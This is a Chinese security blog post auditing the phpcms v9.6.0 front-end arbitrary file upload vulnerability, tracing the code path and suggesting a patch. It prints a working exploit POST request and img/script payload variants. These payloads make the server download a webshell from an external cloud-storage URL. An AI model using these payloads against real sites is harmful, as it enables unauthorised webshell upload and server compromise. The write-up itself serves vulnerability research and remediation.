<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="代码审计_phpcms_v9.6.0任意文件上传"><meta name="keywords" content="安全研究"><meta name="author" content="gshell"><meta name="copyright" content="gshell"><title>代码审计_phpcms_v9.6.0任意文件上传 | gshell's blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.4.0'
} </script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="gshell's blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-phpcms-v9-6-0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">1.</span> <span class="toc-text">代码审计_phpcms_v9.6.0任意文件上传</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/bamao.jpg"></div><div class="author-info__name text-center">gshell</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">7</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">6</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">安全论坛</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.t00ls.net/">tools</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://forum.90sec.com/">90sec</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.freebuf.com/">freebuf</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.sec-in.com/">SecIN</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://bbs.pediy.com/">看雪</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://xz.aliyun.com/">先知</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.anquanke.com/">安全客</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://paper.seebug.org/">seebug</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.52bug.cn">吾爱漏洞</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.0-sec.org/">零组文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.secpulse.com/">安全脉搏</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.shentoushi.top">渗透师</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wiki.bylibrary.cn">白阁文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wooyun.laolisafe.com/">乌云漏洞库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.butian.net/">补天</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vulbox.com/">漏洞盒子</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.bugbank.cn/">漏洞银行</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/blog-bg.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">gshell's blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">首页</a><a class="site-page" href="/archives">安全文章</a><a class="site-page" href="/tags">渗透测试</a><a class="site-page" href="/categories">安全研究</a><a class="site-page" href="/about">关于</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">代码审计_phpcms_v9.6.0任意文件上传</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-11-05</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h4 id="代码审计-phpcms-v9-6-0任意文件上传"><a href="#代码审计-phpcms-v9-6-0任意文件上传" class="headerlink" title="代码审计_phpcms_v9.6.0任意文件上传"></a>代码审计_phpcms_v9.6.0任意文件上传</h4><span id="more"></span>

<p><strong>漏洞描述：</strong></p>
<p>phpcms v9.6.0存在前台任意文件上传漏洞，攻击者可以在未授权的情况下任意文件上传，导致攻击者可以上传恶意文件获取web服务器权限。</p>
<p><strong>影响版本：</strong></p>
<p>phpcms v9.6.0</p>
<p><strong>利用条件：</strong></p>
<p>注册文件开启</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1</span><br></pre></td></tr></table></figure>

<p>需要公网webshell的txt（https不行，必须是http的）：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://webshell-1257078281.cos.ap-nanjing.myqcloud.com/2234.txt</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">POST /phpcms_v9.6.0/install_package/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1 HTTP/1.1</span><br><span class="line">Host: 192.168.56.131</span><br><span class="line">User-Agent: python-requests/2.24.0</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 222</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">siteid=1&amp;modelid=11&amp;username=uqxatkplihzb&amp;password=hzrfinrakahg&amp;email=ylfjlwjuqbkb%40qq.com&amp;info%5Bcontent%5D=%3Cimg+src%3Dhttp%3A%2F%2Fwebshell-1257078281.cos.ap-nanjing.myqcloud.com%2F2234.txt%3F.php%23.jpg%3E&amp;dosubmit=1</span><br></pre></td></tr></table></figure>

<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.png" width="1000">

<p><strong>漏洞exp</strong></p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/2.jpg" width="1000">

<p><strong>漏洞分析</strong></p>
<p>跟进注册文件位置</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">phpcms_v9.6.0\install_package\phpcms\modules\member\index.php</span><br></pre></td></tr></table></figure>

<p>1.使用new_html_special_chars进行编码</p>
<p>2.进入$member_input-&gt;get函数赋值给$user_model_info</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/3.png" width="1000">

<p>跟进$member_input-&gt;get函数文件位置：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">\phpcms_v9.6.0\install_package\caches\caches_model\caches_data\member_input.class.php</span><br></pre></td></tr></table></figure>

<p>使用$this-&gt;attachment-&gt;download函数进行下载</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/4.png" width="1000">

<p>跟进函数文件位置</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">\phpcms_v9.6.0\install_package\phpcms\libs\classes</span><br></pre></td></tr></table></figure>

<p>对$value进行转义，然后匹配正则</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/5.png" width="1000">

<p>输入满足src/href=url.(gif|jpg|jpeg|bmp|png)，这种形式即可。</p>
<p>所以绕过的payloadl类似于下面这种格式是：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;img src=http://webshell-1257078281.cos.ap-nanjing.myqcloud.com/2234.txt?.php#.jpg&gt;</span><br></pre></td></tr></table></figure>

<p>当然</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;script src=http://webshell-1257078281.cos.ap-nanjing.myqcloud.com/2234.txt?.php#.bmp&gt;</span><br></pre></td></tr></table></figure>

<p>也是可以的</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/6.png" width="1000">

<p>接下来利用fillurl去除掉#后面的内容成为：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;img src=http://webshell-1257078281.cos.ap-nanjing.myqcloud.com/2234.txt?.php&gt;</span><br></pre></td></tr></table></figure>

<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/7.png" width="1000">

<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/8.png" width="1000">

<p>利用fileext来获取扩展名，即’php’</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/9.png" width="1000">

<p>紧接着使用upload_func即copy函数进行远程下载</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/10.png" width="1000">

<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/11.png" width="1000">

<p>在phpcms_v9.6.0\install_package\phpcms\modules\member\index.php中，</p>
<p>当$status &gt; 0时会向v9_member_detail的content和userid两列插入数据</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/12.png" width="1000">

<p>status大于0即</p>
<p>除掉用户名邮箱已存在，格式错误，禁止注册等情况下。所以最要是随机生成用户名或者邮箱写exp</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/13.png" width="1000">

<p>在v9_member_detail表中没有列content</p>
<p>所以插入时会产生报错讲路径返回到前台。</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/14.png" width="1000">

<p>构造payload即可成功写入webshell。</p>
<img src="/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/15.png" width="1000">

<p><strong>漏洞修复：</strong></p>
<p>更新补丁，在获取文件扩展名后继续对扩展名进行检测。</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">gshell</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://www.gsheller.top/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">http://www.gsheller.top/2020/11/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1_phpcms_v9.6.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://www.gsheller.top">gshell's blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/">安全研究</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/12/20/%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF-python%E5%85%8D%E6%9D%80/"><i class="fa fa-chevron-left">  </i><span>免杀上线_python反序列化-分离免杀</span></a></div><div class="next-post pull-right"><a href="/2020/09/04/ngnix%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%EF%BC%88phpstudy%E6%9C%80%E6%96%B0%E7%89%88%EF%BC%89/"><span>ngnix解析漏洞（phpstudy最新版）</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/blog-bg.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2021 By gshell</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">低调行进，潜习安全</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>